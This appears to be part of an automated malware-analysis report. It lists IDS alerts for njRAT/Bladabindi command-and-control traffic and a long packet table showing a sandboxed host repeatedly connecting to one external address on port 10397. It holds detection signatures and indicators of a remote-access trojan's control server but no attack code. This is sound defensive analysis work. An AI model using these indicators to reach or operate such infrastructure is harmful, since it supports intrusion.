                                          2024-12-13T12:34:56.918087+01002825564ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)1192.168.2.549983147.185.221.22410397TCP
                                          2024-12-13T12:35:01.999078+01002825564ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)1192.168.2.549983147.185.221.22410397TCP
                                          2024-12-13T12:35:04.566292+01002825564ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)1192.168.2.549983147.185.221.22410397TCP
                                          2024-12-13T12:35:04.813558+01002825564ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)1192.168.2.549983147.185.221.22410397TCP
                                          2024-12-13T12:35:08.575600+01002033132ET MALWARE Generic njRAT/Bladabindi CnC Activity (ll)1192.168.2.549984147.185.221.22410397TCP
                                          2024-12-13T12:35:08.575600+01002021176ET MALWARE Bladabindi/njRAT CnC Command (ll)1192.168.2.549984147.185.221.22410397TCP
                                          2024-12-13T12:35:28.630154+01002825564ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)1192.168.2.549984147.185.221.22410397TCP
                                          2024-12-13T12:35:32.630743+01002033132ET MALWARE Generic njRAT/Bladabindi CnC Activity (ll)1192.168.2.549985147.185.221.22410397TCP
                                          2024-12-13T12:35:32.630743+01002021176ET MALWARE Bladabindi/njRAT CnC Command (ll)1192.168.2.549985147.185.221.22410397TCP
                                          2024-12-13T12:35:33.608286+01002825564ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)1192.168.2.549985147.185.221.22410397TCP
                                          2024-12-13T12:35:33.728289+01002825564ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)1192.168.2.549985147.185.221.22410397TCP
                                          2024-12-13T12:35:34.081838+01002825564ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)1192.168.2.549985147.185.221.22410397TCP
                                          TimestampSource PortDest PortSource IPDest IP
                                          Dec 13, 2024 12:31:51.495613098 CET49714443192.168.2.5162.159.137.232
                                          Dec 13, 2024 12:31:51.495678902 CET44349714162.159.137.232192.168.2.5
                                          Dec 13, 2024 12:31:51.496021986 CET49714443192.168.2.5162.159.137.232
                                          Dec 13, 2024 12:31:51.582590103 CET49714443192.168.2.5162.159.137.232
                                          Dec 13, 2024 12:31:51.582631111 CET44349714162.159.137.232192.168.2.5
                                          Dec 13, 2024 12:31:52.804069042 CET44349714162.159.137.232192.168.2.5
                                          Dec 13, 2024 12:31:52.804160118 CET49714443192.168.2.5162.159.137.232
                                          Dec 13, 2024 12:31:52.811541080 CET49714443192.168.2.5162.159.137.232
                                          Dec 13, 2024 12:31:52.811563015 CET44349714162.159.137.232192.168.2.5
                                          Dec 13, 2024 12:31:52.812011003 CET44349714162.159.137.232192.168.2.5
                                          Dec 13, 2024 12:31:52.901228905 CET49714443192.168.2.5162.159.137.232
                                          Dec 13, 2024 12:31:52.943356991 CET44349714162.159.137.232192.168.2.5
                                          Dec 13, 2024 12:31:53.231583118 CET44349714162.159.137.232192.168.2.5
                                          Dec 13, 2024 12:31:53.232995033 CET49714443192.168.2.5162.159.137.232
                                          Dec 13, 2024 12:31:53.233022928 CET44349714162.159.137.232192.168.2.5
                                          Dec 13, 2024 12:31:53.705888987 CET44349714162.159.137.232192.168.2.5
                                          Dec 13, 2024 12:31:53.705981016 CET44349714162.159.137.232192.168.2.5
                                          Dec 13, 2024 12:31:53.706152916 CET49714443192.168.2.5162.159.137.232
                                          Dec 13, 2024 12:31:53.714976072 CET49714443192.168.2.5162.159.137.232
                                          Dec 13, 2024 12:31:56.004364014 CET4972610397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:31:56.125536919 CET1039749726147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:31:56.127073050 CET4972610397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:31:56.140063047 CET4972610397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:31:56.260049105 CET1039749726147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:31:56.262752056 CET4972610397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:31:56.382713079 CET1039749726147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:32:02.247113943 CET4972610397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:32:02.367027044 CET1039749726147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:32:18.017132998 CET1039749726147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:32:18.017230988 CET4972610397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:32:20.028273106 CET4972610397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:32:20.029377937 CET4977710397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:32:20.147984028 CET1039749726147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:32:20.149202108 CET1039749777147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:32:20.149406910 CET4977710397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:32:20.152009964 CET4977710397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:32:20.271754026 CET1039749777147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:32:20.271819115 CET4977710397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:32:20.392311096 CET1039749777147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:32:26.450354099 CET4977710397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:32:26.572015047 CET1039749777147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:32:37.200493097 CET4977710397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:32:37.320274115 CET1039749777147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:32:40.763597965 CET4977710397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:32:40.884628057 CET1039749777147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:32:42.222918987 CET1039749777147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:32:42.224112034 CET4977710397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:32:44.231573105 CET4977710397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:32:44.232970953 CET4983010397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:32:44.351392031 CET1039749777147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:32:44.352683067 CET1039749830147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:32:44.352850914 CET4983010397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:32:44.355246067 CET4983010397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:32:44.474935055 CET1039749830147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:32:44.474993944 CET4983010397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:32:44.594701052 CET1039749830147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:32:45.653487921 CET4983010397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:32:45.773592949 CET1039749830147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:32:50.932265997 CET4983010397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:32:51.052123070 CET1039749830147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:32:51.418884993 CET4983010397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:32:51.538754940 CET1039749830147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:32:52.965912104 CET4983010397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:32:53.085669041 CET1039749830147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:32:53.091103077 CET4983010397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:32:53.211076021 CET1039749830147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:32:54.168889999 CET4983010397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:32:54.288635969 CET1039749830147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:32:54.288700104 CET4983010397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:32:54.408524990 CET1039749830147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:32:54.409903049 CET4983010397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:32:54.530163050 CET1039749830147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:32:54.530430079 CET4983010397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:32:54.651061058 CET1039749830147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:32:54.651141882 CET4983010397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:32:54.770987988 CET1039749830147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:32:54.772764921 CET4983010397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:32:54.892775059 CET1039749830147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:32:54.892879009 CET4983010397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:32:55.012741089 CET1039749830147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:32:55.012821913 CET4983010397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:32:55.132927895 CET1039749830147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:32:55.133229971 CET4983010397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:32:55.253144979 CET1039749830147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:32:55.256067038 CET4983010397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:32:55.376302004 CET1039749830147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:32:55.379951000 CET4983010397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:32:55.499871016 CET1039749830147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:32:55.500643015 CET4983010397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:32:55.620479107 CET1039749830147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:32:55.622133017 CET4983010397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:32:55.743082047 CET1039749830147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:32:55.746117115 CET4983010397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:32:55.866033077 CET1039749830147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:32:55.866105080 CET4983010397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:32:55.985928059 CET1039749830147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:32:55.988154888 CET4983010397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:32:56.108592033 CET1039749830147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:32:56.110068083 CET4983010397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:32:56.235595942 CET1039749830147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:32:56.235672951 CET4983010397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:32:56.355453968 CET1039749830147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:32:56.355510950 CET4983010397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:32:56.475239038 CET1039749830147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:32:56.475298882 CET4983010397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:32:56.595237017 CET1039749830147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:32:56.595299959 CET4983010397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:32:56.715235949 CET1039749830147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:32:56.715347052 CET4983010397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:32:56.835091114 CET1039749830147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:32:56.835171938 CET4983010397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:32:56.954941988 CET1039749830147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:32:56.955019951 CET4983010397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:32:57.075016022 CET1039749830147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:32:57.075097084 CET4983010397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:32:57.194897890 CET1039749830147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:32:57.194972038 CET4983010397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:32:57.314923048 CET1039749830147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:32:57.315002918 CET4983010397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:32:57.434887886 CET1039749830147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:32:57.436194897 CET4983010397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:32:57.556034088 CET1039749830147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:32:57.556169033 CET4983010397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:32:57.676079035 CET1039749830147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:32:57.676141977 CET4983010397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:32:57.796293974 CET1039749830147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:32:57.800093889 CET4983010397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:32:57.921506882 CET1039749830147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:32:57.921576023 CET4983010397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:32:58.041724920 CET1039749830147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:32:58.041814089 CET4983010397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:32:58.161665916 CET1039749830147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:32:58.164108992 CET4983010397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:32:58.283936024 CET1039749830147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:32:58.284008980 CET4983010397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:32:58.403795958 CET1039749830147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:32:58.403878927 CET4983010397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:32:58.523751020 CET1039749830147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:32:58.523839951 CET4983010397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:32:58.643954039 CET1039749830147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:32:58.644018888 CET4983010397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:32:58.763856888 CET1039749830147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:32:58.764210939 CET4983010397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:32:58.884299994 CET1039749830147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:32:58.884392977 CET4983010397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:32:59.007142067 CET1039749830147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:32:59.008202076 CET4983010397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:32:59.128140926 CET1039749830147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:32:59.129146099 CET4983010397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:32:59.248969078 CET1039749830147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:32:59.249037027 CET4983010397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:32:59.369220972 CET1039749830147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:32:59.372075081 CET4983010397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:32:59.493129969 CET1039749830147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:32:59.493206024 CET4983010397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:32:59.613596916 CET1039749830147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:32:59.615067959 CET4983010397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:32:59.735557079 CET1039749830147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:32:59.736115932 CET4983010397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:32:59.856185913 CET1039749830147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:32:59.860223055 CET4983010397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:32:59.980103970 CET1039749830147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:32:59.980355978 CET4983010397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:33:00.101658106 CET1039749830147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:33:00.102368116 CET4983010397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:33:00.222743034 CET1039749830147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:33:00.224097013 CET4983010397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:33:00.344218969 CET1039749830147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:33:00.344330072 CET4983010397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:33:00.466959953 CET1039749830147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:33:00.467036009 CET4983010397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:33:00.586857080 CET1039749830147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:33:00.586946964 CET4983010397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:33:00.706862926 CET1039749830147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:33:00.706933975 CET4983010397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:33:00.829097986 CET1039749830147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:33:00.829201937 CET4983010397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:33:00.949193001 CET1039749830147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:33:00.949317932 CET4983010397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:33:01.069192886 CET1039749830147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:33:01.069269896 CET4983010397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:33:01.189205885 CET1039749830147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:33:01.189302921 CET4983010397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:33:01.309303045 CET1039749830147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:33:01.309379101 CET4983010397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:33:01.429289103 CET1039749830147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:33:01.430453062 CET4983010397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:33:01.552428007 CET1039749830147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:33:01.552510023 CET4983010397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:33:01.672549009 CET1039749830147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:33:01.672631025 CET4983010397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:33:01.792737961 CET1039749830147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:33:01.794737101 CET4983010397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:33:01.915380955 CET1039749830147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:33:01.915540934 CET4983010397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:33:02.035459042 CET1039749830147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:33:02.035553932 CET4983010397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:33:02.201414108 CET1039749830147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:33:02.202188969 CET4983010397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:33:02.409427881 CET1039749830147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:33:02.409528017 CET4983010397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:33:02.657440901 CET1039749830147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:33:02.657535076 CET4983010397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:33:02.897397041 CET1039749830147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:33:02.897716045 CET4983010397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:33:03.141477108 CET1039749830147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:33:03.308156013 CET4983010397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:33:03.553316116 CET1039749830147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:33:03.553559065 CET4983010397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:33:03.797337055 CET1039749830147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:33:03.797429085 CET4983010397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:33:04.037359953 CET1039749830147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:33:04.037434101 CET4983010397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:33:04.281393051 CET1039749830147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:33:04.281476974 CET4983010397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:33:04.529335022 CET1039749830147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:33:04.530225992 CET4983010397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:33:04.773384094 CET1039749830147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:33:04.773519039 CET4983010397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:33:05.013645887 CET1039749830147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:33:05.013765097 CET4983010397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:33:05.257416964 CET1039749830147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:33:05.258716106 CET4983010397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:33:05.501359940 CET1039749830147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:33:05.501590967 CET4983010397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:33:05.749383926 CET1039749830147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:33:05.749479055 CET4983010397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:33:05.993474007 CET1039749830147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:33:05.993572950 CET4983010397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:33:06.238583088 CET1039749830147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:33:06.238862991 CET4983010397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:33:06.268176079 CET1039749830147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:33:06.437838078 CET1039749830147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:33:08.280539036 CET4988710397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:33:08.400528908 CET1039749887147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:33:08.400718927 CET4988710397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:33:08.403871059 CET4988710397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:33:08.525526047 CET1039749887147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:33:08.525608063 CET4988710397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:33:08.645433903 CET1039749887147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:33:08.645526886 CET4988710397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:33:08.766926050 CET1039749887147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:33:08.767096043 CET4988710397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:33:08.887077093 CET1039749887147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:33:08.887202024 CET4988710397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:33:09.006997108 CET1039749887147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:33:09.007114887 CET4988710397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:33:09.127002954 CET1039749887147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:33:09.127233028 CET4988710397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:33:09.247380018 CET1039749887147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:33:09.247513056 CET4988710397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:33:09.367973089 CET1039749887147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:33:09.368232965 CET4988710397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:33:09.488111019 CET1039749887147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:33:09.488185883 CET4988710397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:33:09.607822895 CET1039749887147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:33:09.612142086 CET4988710397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:33:09.731849909 CET1039749887147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:33:09.732152939 CET4988710397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:33:09.852178097 CET1039749887147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:33:09.855454922 CET4988710397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:33:09.975203037 CET1039749887147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:33:09.975334883 CET4988710397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:33:10.095218897 CET1039749887147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:33:10.095338106 CET4988710397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:33:10.215112925 CET1039749887147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:33:10.215329885 CET4988710397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:33:10.335366011 CET1039749887147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:33:10.339076996 CET4988710397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:33:10.459088087 CET1039749887147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:33:10.459501982 CET4988710397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:33:10.580076933 CET1039749887147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:33:10.581017971 CET4988710397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:33:10.701661110 CET1039749887147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:33:10.702440023 CET4988710397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:33:10.823399067 CET1039749887147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:33:10.826337099 CET4988710397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:33:10.946149111 CET1039749887147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:33:10.946244955 CET4988710397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:33:11.067584038 CET1039749887147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:33:11.067662954 CET4988710397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:33:11.187644005 CET1039749887147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:33:11.188150883 CET4988710397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:33:11.308897972 CET1039749887147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:33:11.309046984 CET4988710397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:33:11.429032087 CET1039749887147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:33:11.429171085 CET4988710397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:33:11.548964977 CET1039749887147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:33:11.549072027 CET4988710397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:33:11.668780088 CET1039749887147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:33:11.668873072 CET4988710397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:33:11.788861990 CET1039749887147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:33:11.788989067 CET4988710397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:33:11.908855915 CET1039749887147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:33:11.908996105 CET4988710397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:33:12.028780937 CET1039749887147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:33:12.028873920 CET4988710397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:33:12.149669886 CET1039749887147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:33:12.149751902 CET4988710397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:33:12.269697905 CET1039749887147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:33:12.269778013 CET4988710397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:33:12.389672041 CET1039749887147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:33:12.389765024 CET4988710397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:33:12.509651899 CET1039749887147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:33:12.510313988 CET4988710397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:33:12.630095005 CET1039749887147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:33:12.630300999 CET4988710397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:33:12.750228882 CET1039749887147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:33:12.751025915 CET4988710397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:33:12.870795965 CET1039749887147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:33:12.874392033 CET4988710397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:33:12.994198084 CET1039749887147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:33:12.996931076 CET4988710397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:33:13.119818926 CET1039749887147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:33:13.121588945 CET4988710397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:33:13.241612911 CET1039749887147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:33:13.244151115 CET4988710397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:33:13.363883972 CET1039749887147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:33:13.363977909 CET4988710397192.168.2.5147.185.221.224
